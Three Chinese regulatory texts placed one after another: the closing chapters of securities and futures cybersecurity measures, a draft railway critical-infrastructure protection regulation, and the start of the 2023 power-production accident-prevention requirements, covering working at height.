安全相关认证、检测、测试和风险评估等监管支撑工作。相关核 心机构应当保障充足的资源投入,完善内部管理制度和工作流程, 保证工作专业性、独立性和公信力。 中国证监会定期对核心机构前款工作情况开展评估,评估通 过的,可以将其作为证券期货业网络和信息安全监管支撑单位, 相关工作情况可以作为中国证监会及其派出机构实施监督管理的 参考依据。 第五十四条 核心机构和经营机构应当加强网络和信息安全 人才队伍建设,建立与网络和信息安全工作特点相适应的人才培 养机制,确保人才资质、经验、专业素质及职业道德符合岗位要 求。 — 15 — 行业协会应当制定网络和信息安全培训计划,定期组织培训 交流,提高证券期货从业人员网络和信息安全意识和专业素养。 第五十五条 核心机构和经营机构应当加强本机构网络和信 息安全宣传与教育,每年至少开展一次全员网络和信息安全教育 活动,提升员工网络和信息安全意识。 经营机构应当定期组织开展面向投资者的网络和信息安全宣 传教育活动,结合网上证券期货业务活动的特点,揭示网络和信 息安全风险,增强投资者风险防范能力。 第五十六条 行业协会应当鼓励、引导网络和信息安全技术 创新与应用,增强自主可控能力,组织开展科技奖励,促进行业 科技进步。 行业协会应当引导信息技术系统服务机构规范参与行业网络 和信息安全和信息化工作,提升服务的安全合规水平,促进市场 有序竞争。 第七章 监督管理与法律责任 第五十七条 核心机构、经营机构和信息技术系统服务机构 应当向中国证监会及其派出机构报送或者提供证券期货业网络和 信息安全管理相关信息和数据,确保有关信息和数据的真实、准 确、完整。 第五十八条 中国证监会负责建立健全行业网络和信息安全 — 16 — 态势感知工作机制,并就相关安全缺陷、安全漏洞等风险隐患开 展行业通报预警。核心机构、经营机构和信息技术系统服务机构 应当及时排查并采取风险防范措施。 第五十九条 核心机构和经营机构应当于每年 4 月 30 日前, 完成对上一年网络和信息安全工作的专项评估,编制网络和信息 安全管理年报,报送中国证监会及其派出机构,年报内容包括但 不限于网络和信息安全治理情况、人员情况、投入情况、风险情 况、处置情况和下一年度工作计划等。 核心机构和经营机构报送网络和信息安全管理年报时,可以 与中国证监会要求的信息科技管理专项报告等其他年度信息科技 类报告合并报送,关键信息基础设施安全保护年度计划除外。 证券期货业关键信息基础设施运营者应当将关键信息基础设 施网络和信息安全检测和风险评估情况纳入网络和信息安全管理 年报。 第六十条 中国证监会及其派出机构可以委托国家、行业有 关专业机构采用漏洞扫描、风险评估等方式,协助对核心机构、 经营机构和信息技术系统服务机构开展监督、检查。 第六十一条 中国证监会可以根据国家有关要求或者行业工 作需要,组织开展证券期货业重要时期网络和信息安全保障。中 国证监会派出机构负责督促本辖区经营机构和信息技术系统服务 机构落实相关工作要求。 证券期货业重要时期网络和信息安全保障期间,核心机构和 — 17 — 经营机构应当遵循安全优先的原则,加强安全生产值守,严格落 实信息报送要求。 第六十二条 核心机构违反本办法规定的,中国证监会可以 对其采取责令改正、监管谈话等监管措施;对有关高级管理人员 给予警告、记过、记大过、降级、撤职、开除等行政处分,并责 令核心机构对其他责任人给予纪律处分。 经营机构和信息技术系统服务机构违反本办法规定的,中国 证监会及其派出机构可以对其采取责令改正、监管谈话、出具警 示函、责令公开说明、责令定期报告、责令增加内部合规检查次 数等监管措施;对直接责任人和其他责任人员采取责令改正、监 管谈话、出具警示函等监管措施;情节严重的,对相关机构及责 任人员单处或者并处警告、十万元以下罚款,涉及金融安全且有 危害后果的,并处二十万元以下罚款。 第六十三条 经营机构违反本办法规定,反映机构治理混乱、 内控失效或者不符合持续性经营规则的,中国证监会及其派出机 构可以依照《证券法》《期货和衍生品法》《证券投资基金法》相 关规定,采取责令暂停借助网络开展部分业务或者全部业务、责 令更换董事、监事、高级管理人员或者限制其权利等监管措施。 信息技术系统服务机构违反本办法规定,未履行备案义务的, 中国证监会及其派出机构可以依照《证券法》《期货和衍生品法》 相关规定予以处罚。 第六十四条 核心机构、经营机构和信息技术系统服务机构 — 18 — 违反本办法第九条、第十条、第十八条、第十九条、第二十条、 第三十七条、第三十九条规定,未履行网络和信息安全保护义务, 或者应急管理存在重大过失的,中国证监会及其派出机构可以依 照《网络安全法》相关规定予以处罚。 证券期货业关键信息基础设施运营者未履行本办法第九条、 第十条、第十八条、第十九条、第二十条、第二十二条、第三十 七条、第三十八条、第四十二条、第四十四条、第四十六条、第 四十九条、第五十五条规定的网络安全保护义务的,中国证监会 及其派出机构可以依照《网络安全法》 《关键信息基础设施安全保 护条例》相关规定予以处罚。 第六十五条 核心机构和经营机构违反本办法第十七条、第 三十六条规定,擅自暂停或者终止借助网络向投资者提供服务, 对其产品、服务存在安全缺陷、漏洞等风险未立即采取补救措施, 或者未按照规定及时报告的,中国证监会及其派出机构可以依照 《网络安全法》相关规定予以处罚。 第六十六条 违反本办法第二十四条规定,开展证券期货业 信息系统认证、检测、风险评估等活动,或者向社会发布证券期 货业信息安全漏洞、计算机病毒、网络攻击、网络侵入等信息的, 中国证监会及其派出机构可以依照《网络安全法》相关规定予以 处罚。 第六十七条 核心机构和经营机构违反本办法第二十五条规 定,对法律、行政法规禁止发布或者传输的信息未停止传输、采 — 19 — 取消除等处置措施、保存有关记录的,中国证监会及其派出机构 可以依照《网络安全法》相关规定予以处罚。 第六十八条 核心机构和经营机构违反本办法第三十一条第 一款、第三十二条、第三十三条规定,违规处理个人信息,或者 处理个人信息未履行个人信息保护义务的,中国证监会及其派出 机构可以依照《网络安全法》 《个人信息保护法》相关规定予以处 罚。 第六十九条 核心机构、经营机构和信息技术系统服务机构 拒绝、阻碍中国证监会及其派出机构行使监督检查、调查职权的, 中国证监会及其派出机构可以依法予以处罚。 第七十条 核心机构和经营机构参加资本市场金融科技创新 机制或者信息技术应用创新机制,相关项目发生网络安全事件, 相关机构处置得当,积极消除不良影响的,中国证监会及其派出 机构可以予以从轻或者减轻处罚,未对证券期货市场产生不良影 响的,可以免于处罚。 第八章 附 则 第七十一条 本办法中下列用语的含义: (一)核心机构,包括证券期货交易场所、证券登记结算机 构等承担证券期货市场公共职能、承担证券期货业信息技术公共 基础设施运营的证券期货市场核心机构及其承担上述相关职能的 — 20 — 下属机构。 (二)经营机构,是指证券公司、期货公司和基金管理公司 等证券期货经营机构。 (三)信息技术系统服务机构,是指为证券期货业务活动提 供重要信息系统的开发、测试、集成、测评、运维及日常安全管 理等产品或者服务的机构。 (四)双活或者多活架构,是指在同城或者异地的两个或者 多个数据中心同时对外提供服务,当其中一个或者多个数据中心 发生灾难性事故时,可以将原先由其承载的服务请求划拨至其他 正常运作的数据中心,保障业务连续运行。 (五)重要信息系统,是指承载证券期货业关键业务活动, 如出现系统服务异常、数据泄露等情形,将对证券期货市场和投 资者产生重大影响的信息系统。 (六)可能对证券期货市场安全平稳运行产生较大影响,是 指依据网络安全事件调查处理有关办法,可能引发较大或者以上 级别网络安全事件的情形。 (七)“以上”含本数,“以下”不含本数。 第七十二条 本办法规定的核心机构、经营机构和信息技术 系统服务机构相关报告事项,是指依照监管职责,核心机构应当 向中国证监会报告;除中国证监会另有要求的,经营机构和信息 技术系统服务机构原则上应当向属地中国证监会派出机构报告。 第七十三条 国家对存储、处理涉及国家秘密信息的网络和 — 21 — 信息安全管理另有规定的,从其规定。 第七十四条 境内开展证券公司客户交易结算资金第三方存 管业务、期货保证金存管业务的商业银行,证券投资咨询机构, 基金托管机构和从事公开募集基金的销售、销售支付、份额登记、 估值、投资顾问、评价等基金服务业务的机构,从事证券期货业 务活动的经营机构子公司,借助自身运维管理的信息系统从事证 券投资活动且存续产品涉及基金份额持有人账户合计一千人以上 的私募证券投资基金管理人,应当根据相关信息系统网络和信息 安全管理的特点,参照适用本办法。 核心机构和经营机构设立信息科技专业子公司,为母公司提 供信息科技服务的,信息科技专业子公司应当按照本办法落实网 络和信息安全相关要求。 第七十五条 本办法自 2023 年 5 月 1 日起施行。2012 年 11 月 1 日公布的《证券期货业信息安全保障管理办法》 (证监会令第 82 号)同时废止。 — 22 —
standards
铁路关键信息基础设施安全保护管理办法 (征求意见稿) 第一章 总则 第一条 为了保障铁路关键信息基础设施安全,维护网络安全,根据《中华人民共和国网络安全法》《关键信息基础设施安全保护条例》等法律、行政法规,制定本办法。 第二条 铁路关键信息基础设施的安全保护和监督管理工作,适用本办法。 前款所称铁路关键信息基础设施是指在铁路领域,一旦遭到破坏、丧失功能或者数据泄露,可能严重危害国家安全、国计民生和公共利益的重要网络设施、信息系统等。 第三条 国家铁路局依法负责全国铁路关键信息基础设施安全保护和监督管理工作,是铁路关键信息基础设施安全保护工作部门。 地区铁路监督管理局依据国家铁路局要求,开展相关工作。 第四条 铁路关键信息基础设施安全保护坚持强化和落实铁路关键信息基础设施运营者(以下简称运营者)主体责任,加强和规范保护工作部门监督管理,发挥社会各方面的作用,共同保护铁路关键信息基础设施安全。 第五条 任何个人和组织不得实施非法侵入、干扰、破坏铁路关键信息基础设施的活动,不得危害铁路关键信息基础设施安全。 未经国家网信部门、国务院公安部门批准或者国家铁路局、运营者授权,任何个人和组织不得对铁路关键信息基础设施实施漏洞探测、渗透性测试等可能影响或者危害铁路关键信息基础设施安全的活动。 第二章 铁路关键信息基础设施认定 第六条 国家铁路局负责制定铁路关键信息基础设施认定规则。 制定认定规则应当主要考虑下列因素: (一)网络设施、信息系统等对于铁路关键核心业务的重要程度; (二)网络设施、信息系统等一旦遭到破坏、丧失功能或者数据泄露可能带来的危害程度; (三)对其他行业和领域的关联性影响。 第七条 国家铁路局根据认定规则,负责组织认定铁路关键信息基础设施,及时将认定结果通知运营者,并通报国务院公安部门。 第八条 铁路关键信息基础设施发生改建、扩建、运营者变更等较大变化,可能影响认定结果的,运营者应当及时将相关情况报告国家铁路局。国家铁路局自收到报告之日起3个月内完成重新认定,将认定结果通知运营者,并通报国务院公安部门。 第三章 运营者责任和义务 第九条 运营者应当在国家网络安全等级保护制度的基础上,突出保护重点,落实防护措施,加强全生命周期管理,保障铁路关键信息基础设施安全稳定运行,维护数据的完整性、保密性和可用性。 第十条 新建、改建、扩建铁路关键信息基础设施的,运营者应当做到安全防护措施与关键信息基础设施同步规划、同步建设、同步使用。 运营者应当按照国家有关规定对安全保护措施予以验证。 第十一条 运营者应当建立健全网络安全保护制度和责任制,保障人力、财力、物力投入。 运营者的主要负责人对所运营的铁路关键信息基础设施安全保护负总责,领导关键信息基础设施安全保护和重大网络安全事件处置工作,组织研究解决重大网络安全问题。 运营者应明确一名领导班子成员分管铁路关键信息基础设施安全保护工作,并为每个铁路关键信息基础设施明确安全管理责任人。 第十二条 运营者应当设置专门安全管理机构,并对专门安全管理机构负责人和关键岗位人员进行安全背景审查。 运营者应当保障专门安全管理机构的人员配备,开展与网络安全和信息化有关的决策,应当有专门安全管理机构人员参与。 专门安全管理机构的负责人和关键岗位人员的身份、安全背景等发生变化或必要时,运营者应当根据情况重新进行安全背景审查。 第十三条 专门安全管理机构具体负责本单位的铁路关键信息基础设施安全保护工作,履行下列职责: (一)建立健全网络安全管理、评价考核制度,拟订铁路关键信息基础设施安全保护计划; (二)组织推动网络安全防护能力建设,开展网络安全监测、检测和风险评估; (三)按照国家及铁路行业要求,制定本单位网络安全事件应急预案,定期开展应急演练,处置网络安全事件; (四)认定网络安全关键岗位,组织开展网络安全工作考核,提出奖励和惩处建议; (五)组织网络安全教育、培训; (六)履行个人信息和数据安全保护责任,建立健全个人信息和数据安全保护制度; (七)对铁路关键信息基础设施设计、建设、运行、维护等服务实施安全管理; (八)按照规定报告网络安全事件和重要事项。 第十四条 运营者应当加强供应链安全保护,优先采购安全可信的网络产品和服务;采购网络产品和服务影响或者可能影响国家安全的,运营者应当预判网络产品和服务投入使用后可能带来的国家安全风险,按照国家有关规定申报网络安全审查。 第十五条 运营者应当加强数据安全保护,明确重要数据和个人信息的保护措施,将在我国境内运营中收集和产生的个人信息和重要数据存储在境内。因业务需要,确需向境外提供数据的,应当按照国家相关规定和标准进行安全评估。法律、行政法规另有规定的,依照其规定执行。 第十六条 运营者应当自行或者委托网络安全服务机构对铁路关键信息基础设施每年至少进行一次网络安全检测和风险评估,对发现的安全问题及时整改,并按照国家铁路局要求报送情况。 第十七条 法律、行政法规和国家有关规定要求使用商用密码进行保护的铁路关键信息基础设施,运营者应当使用商用密码进行保护,自行或者委托商用密码检测机构每年至少开展一次商用密码应用安全性评估。 商用密码应用安全性评估应当与铁路关键信息基础设施安全检测和风险评估、网络安全等级测评制度相衔接,避免重复评估、测评。 第十八条 运营者应当加强全过程保密管理,采购网络产品和服务,应当按照规定与提供者签订安全保密协议,明确提供者的技术支持和安全保密义务与责任,并对义务与责任履行情况进行监督。 第十九条 运营者应当制定本单位的监测预警和信息通报制度,加强对铁路关键信息基础设施监测,研判整体安全态势。 第二十条 铁路关键信息基础设施发生重大网络安全事件或者发现重大网络安全威胁时,运营者按照有关规定向国家铁路局、公安机关报告,并立即启动本单位网络安全事件应急预案。 铁路关键信息基础设施发生特别重大网络安全事件或者发现特别重大网络安全威胁时,国家铁路局应当在收到报告后,及时向国家网信部门、国务院公安部门报告。 第二十一条 运营者发生合并、分立、解散等情况,应当及时报告国家铁路局,并按照国家铁路局的要求对铁路关键信息基础设施进行处置,确保安全。 第四章 保障和监督 第二十二条 国家铁路局应当制定铁路关键信息基础设施安全规划,明确保护目标、基本要求、工作任务、具体措施。 第二十三条 国家铁路局应当组织建立铁路关键信息基础设施网络安全监测预警制度,充分利用网络安全信息共享机制,及时掌握铁路关键信息基础设施运行状况、安全态势,预警通报网络安全威胁和隐患,指导做好安全防范工作。 第二十四条 国家铁路局应当组织建立铁路关键信息基础设施网络安全事件应急预案体系,定期组织应急演练;指导运营者做好网络安全事件应对处置,并根据需要组织提供技术支持与协助。 第二十五条 国家铁路局定期组织开展铁路关键信息基础设施网络安全检查检测,指导监督运营者及时整改安全隐患、完善安全措施。 检查工作不得收取费用,不得要求被检查单位购买指定品牌或者指定生产、销售单位的产品和服务。 第二十六条 运营者对国家铁路局依法开展的网络安全检查检测工作,以及公安、国家安全、保密行政管理、密码管理等有关部门依法开展的铁路关键信息基础设施网络安全检查工作应当予以配合。 第二十七条 国家铁路局、网络安全服务机构及其工作人员对于在铁路关键信息基础设施安全保护过程中获取的信息,只能用于维护网络安全,并严格按照有关法律、行政法规的要求确保信息安全,不得泄露、出售或者非法向他人提供。 第五章 法律责任 第二十八条 运营者违反本办法规定的,由国家铁路局按照《关键信息基础设施安全保护条例》等法律、行政法规的规定予以处罚。 第二十九条 国家铁路局及其工作人员存在下列情形之一的,按照《关键信息基础设施安全保护条例》等法律、行政法规的规定予以处分: (一)未履行铁路关键信息基础设施安全保护和监督管理职责或者玩忽职守、滥用职权、徇私舞弊的; (二)在开展铁路关键信息基础设施网络安全检查工作中收取费用,或者要求被检查单位购买指定品牌或者指定生产、销售单位的产品和服务的; (三)将在铁路关键信息基础设施安全保护工作中获取的信息用于其他用途,或者泄露、出售、非法向他人提供的。 第六章 附则 第三十条 本办法自202X年X月X日起施行。
standards
防止电力生产事故的二十五项重点要求 (2023 版) 国家能源局 二〇二三年三月 目 录 1 防止人身伤亡事故的重点要求 .................................................................................................... 1 1.1 防止高处坠落事故 ............................................................................................................. 1 1.2 防止触电事故 ..................................................................................................................... 3 1.3 防止物体打击事故 ............................................................................................................. 6 1.4 防止机械伤害事故 ............................................................................................................. 7 1.5 防止灼烫伤害事故 ............................................................................................................. 8 1.6 防止起重伤害事故 ............................................................................................................. 9 1.7 防止坍塌伤害事故 ........................................................................................................... 11 1.8 防止中毒窒息事故 ........................................................................................................... 12 1.9 防止电力生产交通事故 ................................................................................................... 15 1.10 防止电力生产淹溺事故 ................................................................................................. 16 1.11 防止烟气脱硫设备及其系统中人身伤亡事故 ............................................................. 17 1.12 防止液氨储罐泄漏、中毒、爆炸伤人事故 .................................................................17 2 防止火灾事故的重点要求 .......................................................................................................... 19 2.1 加强防火组织与消防设施管理 ....................................................................................... 19 2.2 防止发电厂电缆着火事故 ............................................................................................... 21 2.3 防止汽机油系统着火事故 ............................................................................................... 23 2.4 防止燃油罐区及锅炉油系统着火事故 ........................................................................... 24 2.5 防止制粉系统爆炸事故 ................................................................................................... 24 2.6 防止氢气系统爆炸事故 ................................................................................................... 25 2.7 防止输煤皮带着火事故 ................................................................................................... 25 2.8 防止脱硫、湿除系统着火事故 ....................................................................................... 26 2.9 防止氨系统着火爆炸事故 ............................................................................................... 27 2.10 防止天然气系统着火爆炸事故 ..................................................................................... 28 2.11 防止风力发电机组着火事故 ......................................................................................... 30 2.12 防止电化学储能电站火灾事故 ..................................................................................... 32 3 防止电气误操作事故的重点要求 .............................................................................................. 33 3.1 防误操作技术措施 ............................................................................................................ 33 3.2 防误操作管理措施 ............................................................................................................ 35 4 防止系统稳定破坏事故的重点要求 .......................................................................................... 35 4.1 加强电源支撑能力 ........................................................................................................... 35 4.2 加强系统网架结构 ........................................................................................................... 37 4.3 加强系统稳定分析及管理 ............................................................................................... 38 4.4 增强电力监控系统(二次系统)可靠性 .......................................................................39 4.5 防止系统无功电压稳定破坏 ........................................................................................... 40 4.6 加强大面积停电恢复能力 ............................................................................................... 41 5 防止机网协调及风电机组、光伏逆变器大面积脱网事故的重点要求 ..................................41 5.1 防止机网协调事故 ........................................................................................................... 41 5.2 防止风电机组、光伏逆变器大面积脱网事故 ...............................................................46 6 防止锅炉事故的重点要求 .......................................................................................................... 49 6.1 防止锅炉尾部再次燃烧事故 ........................................................................................... 49 I 6.2 防止锅炉炉膛爆炸事故 ................................................................................................... 54 6.3 防止制粉系统爆炸和煤尘爆炸事故 ............................................................................... 59 6.4 防止锅炉满水和缺水事故 ............................................................................................... 62 6.5 防止锅炉承压部件失效事故 ........................................................................................... 65 6.6 防止农林生物质发电事故 ............................................................................................... 72 7 防止压力容器等承压设备爆破事故的重点要求 ......................................................................73 7.1 防止承压设备超压事故 ................................................................................................... 73 7.2 防止氢罐等压力容器爆炸事故 ....................................................................................... 74 7.3 防止压力容器脱检漏检 ................................................................................................... 75 7.4 防止压力容器违规使用 ................................................................................................... 75 8 防止汽轮机、燃气轮机事故的重点要求 .................................................................................. 76 8.1 防止汽轮机超速事故 ....................................................................................................... 76 8.2 防止汽轮机轴系断裂及损坏事故 ................................................................................... 77 8.3 防止汽轮机大轴弯曲事故 ............................................................................................... 79 8.4 防止汽轮机、燃气轮机轴瓦损坏事故 ........................................................................... 82 8.5 防止燃气轮机超速事故 ................................................................................................... 84 8.6 防止燃气轮机轴系断裂及损坏事故 ............................................................................... 85 8.7 防止燃气轮机燃气系统泄漏爆炸事故 ........................................................................... 88 9 防止分散控制系统失灵事故的重点要求 .................................................................................. 90 9.1 防止分散控制系统供电系统事故 ................................................................................... 90 9.2 防止分散控制系统硬件事故 ........................................................................................... 91 9.3 防止就地热工设备异常引发事故 ................................................................................... 92 9.4 防止因检修、维护不当引发事故 ................................................................................... 94 9.5 防止保护系统失灵事故 ................................................................................................... 94 9.6 防止模拟量调节事故 ....................................................................................................... 96 9.7 防止 RB 系统事故 ............................................................................................................ 96 9.8 防止分散控制系统网络事故 ........................................................................................... 96 9.9 防止水电厂(站)计算机监控系统事故 .......................................................................97 9.10 防止水机保护失灵 ....................................................................................................... 100 9.11 主控系统失灵的紧急处理措施 ................................................................................... 102 10 防止发电机及调相机损坏事故的重点要求 .......................................................................... 102 10.1 防止定子绕组故障 ....................................................................................................... 102 10.2 防止定子铁心故障 ....................................................................................................... 104 10.3 防止转子绕组故障 ....................................................................................................... 105 10.4 防止转子大轴及护环损伤 ........................................................................................... 107 10.5 防止内冷水系统故障 ................................................................................................... 108 10.6 防止发生局部过热 ....................................................................................................... 110 10.7 防止氢冷发电机漏氢 ................................................................................................... 111 10.8 防止励磁系统故障引起设备损坏 ............................................................................... 113 10.9 防止出线及外部回路设备故障 ................................................................................... 114 10.10 防止非正常运行造成设备损坏 ................................................................................. 116 10.11 防止水轮发电机启停故障 ......................................................................................... 117 10.12 加强在线监测装置运行管理 ..................................................................................... 118 10.13 防止检修不当造成设备损坏 ..................................................................................... 118 II 11 防止发电机励磁系统事故的重点要求 .................................................................................. 119 11.1 励磁系统设计的重点要求 ........................................................................................... 119 11.2 励磁系统基建安装及设备改造的重点要求 ............................................................... 120 11.3 励磁系统调整试验的重点要求 ................................................................................... 121 11.4 励磁系统运行安全的重点要求 ................................................................................... 122 12 防止大型变压器和互感器损坏事故的重点要求 ..................................................................123 12.1 防止变压器出口短路事故 ........................................................................................... 123 12.2 防止变压器绝缘事故 ................................................................................................... 124 12.3 防止变压器保护事故 ................................................................................................... 125 12.4 防止分接开关事故 ....................................................................................................... 125 12.5 防止变压器套管事故 ................................................................................................... 126 12.6 防止冷却系统事故 ....................................................................................................... 126 12.7 防止变压器火灾事故 ................................................................................................... 126 12.8 防止互感器事故 ........................................................................................................... 127 13 防止开关设备事故的重点要求 .............................................................................................. 129 13.1 防止气体绝缘金属封闭开关设备(GIS、包括 HGIS)、SF6 断路器事故 ........... 129 13.2 防止敞开式隔离开关、接地开关事故 ....................................................................... 134 13.3 防止高压开关柜事故 ................................................................................................... 135 14 防止接地网和过电压事故的重点要求 .................................................................................. 137 14.1 防止接地网事故 ........................................................................................................... 137 14.2 防止雷电过电压事故 ................................................................................................... 139 14.3 防止变压器过电压事故 ............................................................................................... 140 14.4 防止谐振过电压事故 ................................................................................................... 141 14.5 防止弧光接地过电压事故 ........................................................................................... 141 14.6 防止无间隙金属氧化物避雷器事故 ........................................................................... 142 14.7 防止避雷针事故 ........................................................................................................... 142 15 防止架空输电线路事故的重点要求 ...................................................................................... 143 15.1 防止倒塔(杆)事故 ................................................................................................... 143 15.2 防止断线事故 ............................................................................................................... 145 15.3 防止绝缘子和金具断裂事故 ....................................................................................... 145 15.4 防止风偏闪络事故 ....................................................................................................... 146 15.5 防止覆冰、舞动事故 ................................................................................................... 147 15.6 防止鸟害闪络事故 ....................................................................................................... 148 15.7 防止外力破坏事故 ....................................................................................................... 149 15.8 防止“三跨”事故 ............................................................................................................150 16 防止污闪事故的重点要求 ...................................................................................................... 152 17 防止电力电缆损坏事故的重点要求 ...................................................................................... 154 17.1 防止电缆绝缘击穿事故 ............................................................................................... 154 17.2 防止电缆火灾事故 ....................................................................................................... 156 17.3 防止外力破坏和设施被盗 ........................................................................................... 158 18 防止继电保护及安全自动装置事故的重点要求 ..................................................................159 18.1 规划设计阶段的重点要求 ........................................................................................... 159 18.2 继电保护配置的重点要求 ........................................................................................... 162 18.3 调试及检验的重点要求 ............................................................................................... 165 III 18.4 运行管理阶段的重点要求 ........................................................................................... 166 18.5 定值管理的重点要求 ................................................................................................... 168 18.6 二次回路的重点要求 ................................................................................................... 169 18.7 智能变电站继电保护的重点要求 ............................................................................... 173 19 防止电力自动化系统、电力监控系统网络安全、电力通信网及信息系统事故的重点要求174 19.1 防止电力自动化系统事故 ........................................................................................... 174 19.2 防止电力监控系统网络安全事故 ............................................................................... 177 19.3 防止电力通信网事故 ................................................................................................... 180 19.4 防止信息系统事故 ....................................................................................................... 186 20 防止串联电容器补偿装置和并联电容器装置事故的重点要求 ..........................................187 20.1 防止串联电容器补偿装置事故 ................................................................................... 187 20.2 防止高压并联电容器装置事故 ................................................................................... 189 21 防止直流换流站设备损坏和单双极强迫停运事故的重点要求 ..........................................191 21.1 防止换流阀损坏事故 ................................................................................................... 191 21.2 防止换流变压器(油浸式平波电抗器)事故 ...........................................................193 21.3 防止失去站用电事故 ................................................................................................... 195 21.4 防止外绝缘事故 ........................................................................................................... 196 21.5 防止直流控制保护设备事故 ....................................................................................... 196 22 防止发电厂、变电站全停及重要电力用户停电事故的重点要求 ......................................198 22.1 防止发电厂全停事故 ................................................................................................... 198 22.2 防止变电站和发电厂升压站全停事故 ....................................................................... 199 22.3 防止重要电力用户停电事故 ....................................................................................... 205 23 防止水轮发电机组(含抽水蓄能机组)事故的重点要求 ..................................................208 23.1 防止机组飞逸 ............................................................................................................... 208 23.2 防止水轮机损坏 ........................................................................................................... 209 23.3 防止水轮发电机重大事故 ........................................................................................... 213 23.4 防止抽水蓄能机组相关事故 ....................................................................................... 217 24 防止垮坝、水淹厂房及厂房坍塌事故的重点要求 ..............................................................220 24.1 加强大坝、厂房设计 ................................................................................................... 220 24.2 落实大坝、厂房施工期防洪度汛措施 ....................................................................... 221 24.3 加强大坝、厂房日常运行管理 ................................................................................... 222 25 防止重大环境污染事故的重点要求 ...................................................................................... 224 25.1 严格执行环境影响评价制度与环保“三同时”原则 ................................................... 224 25.2 加强贮灰场运行维护管理 ........................................................................................... 225 25.3 加强废水处理,防止超标排放 ................................................................................... 225 25.4 加强除尘、除灰、除渣设施运行维护管理 ...............................................................226 25.5 加强脱硫设施运行维护管理 ....................................................................................... 227 25.6 加强脱硝设施运行维护管理 ....................................................................................... 227 25.7 加强烟气在线连续监测装置运行维护管理 ...............................................................228 附录 引用法律法规和标准规范目录 .......................................................................................... 229 IV 防止电力生产事故的二十五项重点要求 1 防止人身伤亡事故的重点要求 1.1 防止高处坠落事故 1.1.1 高处作业人员必须经职业健康体检合格(检查周期为 1 年),凡患有 不宜从事高处作业病症的人员,不得参加高处作业。 1.1.2 高处作业人员,必须经过专业技能培训,并取得合格证书后方可上岗。 1.1.3 高处作业应穿工作服、防滑鞋,正确佩戴使用个人安全防护用具,并 设专人监护。 高处作业人员配备的安全帽、安全带、安全绳、攀登自锁器、防坠器等应检 验合格并符合要求;使用前应检查确认。安全带、安全绳必须系在牢固物件上, 防止脱落。安全带应采取高挂低用的方式,安全带的使用长度应事前调整合适, 必要时加缓冲器,避免在高空坠落防护范围内造成二次冲击或应力伤害。作业人 员应随时检查安全带、安全绳是否拴牢,在转移作业位置时不得失去安全保护。 高处作业所用的工具和材料应放在工具袋内或用绳索拴在牢固的构件上,较 大的工具应系保险绳。上下传递物件应使用绳索,不得抛掷。 1.1.4 遇有阵风风力 6 级及以上以及暴雨、雷电、冰雹、大雾、沙尘暴等恶 劣天气,应停止露天高处作业;冰雪、霜冻、雨雾天气未采取防滑、防寒、防冻 措施,禁止进行高处作业。在夜间或光线不足的地方作业,应设充足的照明。 特殊情况下,确需在恶劣天气进行抢修时,应制定完善的安全措施,经本单 位批准,并在安全措施执行到位后方可进行高处作业。 1.1.5 高处作业应设有防止作业人员失误、失踏或坐靠坠落的牢固作业立足 面、防护栏、防护网、停歇区等。立足面应有足够面积,脚手板应满铺并有效固 定。 1.1.6 施工或生产作业区的通道及各种孔、洞、井、沟、坑口、平台等临边 部位应设置可靠的安全防护设施、悬挂安全标志牌。 基坑(槽)临边应装设合格牢固的防护栏杆,防护栏杆上除安全标志牌外不 得拴挂任何物件。上下基坑必须设置专用斜道、梯道、扶梯、入坑踏步等攀登设 1 施,作业人员严禁沿坑壁、支撑或乘坐运土工具上下。 1.1.7 作业现场常设洞口应设盖板并盖实、表面刷黄黑相间的安全警示线或 装设栏杆护板;临时洞口或洞口盖板掀开后,应装设刚性防护栏杆,装设挡脚板, 悬挂安全标志牌,夜间无照明或照明不足时应设红灯警示。 1.1.8 登高用的支撑架、脚手架、作业平台应使用合格材质搭设。高处作业 层应装有防护栏杆并搭设牢固,经验收合格后方可使用,使用中严禁超载。 作业层脚手板必须铺满、铺稳、铺实、铺平,脚手板和脚手架应连接牢固。 禁止使用单板或大于 150mm 的探头板。作业层脚手板下必须采用足够强度的安 全平网兜底,以下每隔不大于 10m 必须采用安全平网封闭。 脚手架内立杆与建筑物距离大于 150mm 时,必须采取封闭防护措施。 特殊形式的脚手架,如悬吊式脚手架、水电站的进水口处脚手架、调压井处 脚手架等,应专门设计并经批准。 1.1.9 作业现场使用移动高处作业平台四周应设置保护栏杆、护脚板或其他 保护设施,作业平台表面应防滑、支撑稳定,不得超载。 移动式升降工作平台应经验收合格后方可投入使用。操作人员必须经专业培 训合格,操作时遵守安全操作规程和制造商的操作使用说明。工作平台升降作业 时,必须设置醒目的作业警戒控制区,悬挂安全标志牌和风险告知牌,无关人员 严禁入内。 1.1.10 高处作业应使用有防滑保护装置(如防滑套、挂钩等)的合格的梯子, 梯阶的距离不应大于 30cm,并在距梯顶 1m 处设限高标志。使用单梯工作时, 梯腿和水平面之间的夹角为 65 度至 75 度之间,梯子应有人扶持,以防失稳坠落。 梯上有人时,禁止移动梯子。 1.1.11 作业现场使用的吊篮应检验合格,悬挂机构的结构件应有足够的强 度、刚度、配重以及可固定措施。操作人员应经专门培训。 禁止货运吊篮、索道载人。 吊篮的每个吊点处除工作钢丝绳外还应独立设置安全钢丝绳,安全钢丝绳必 须装有安全锁或相同作用的独立防坠落装置。 1.1.12 线路施工作业,登杆塔前应对塔架、根部、基础、拉线、桩锚、地脚 螺母(螺栓)等进行全面检查。合格后,方可登杆塔作业。 2 1.1.13 在轻质型材等强度不足的高处作业面(如石棉瓦、铁皮板、采光浪板、 装饰板、屋面光伏板等)上作业,必须搭设带安全护栏的临时通道,悬挂安全标 志牌,在梁下张设安全平网或搭设安全防护设施。 严禁无有效防护措施在轻质型材上行走、作业。 1.1.14 绑扎钢筋和安装钢筋骨架需要悬空作业时,必须搭设脚手架和上下通 道,严禁攀爬钢筋骨架;绑扎圈梁、挑梁、挑檐、外墙、边柱和悬空梁等构件的 钢筋时,必须设置合格作业平台;绑扎立柱和墙体钢筋时,严禁站在钢筋骨架上 或攀登骨架作业。 严禁未设置作业平台,进行高处绑扎柱钢筋作业、预应力张拉作业和开展临 边高度 2m 及以上混凝土结构构件浇筑作业。 模板安装和拆卸时,作业人员必须有可靠的立足点和防护措施。上下模板支 撑架必须设置专用攀登通道,不得在连接件和支撑件上攀登,不得在上下同一垂 直面上装拆模板。 钢结构安装或装配式混凝土结构安装作业层未设置手扶水平安全绳、未搭设 水平通道、两侧未设置防护栏杆,禁止作业。 严禁在未固定、无有效防护措施的物件以及安装中的管道上作业或通行。 1.1.15 在煤(粉、灰)仓或斗内作业时,作业人员必须佩戴防坠器和全身式 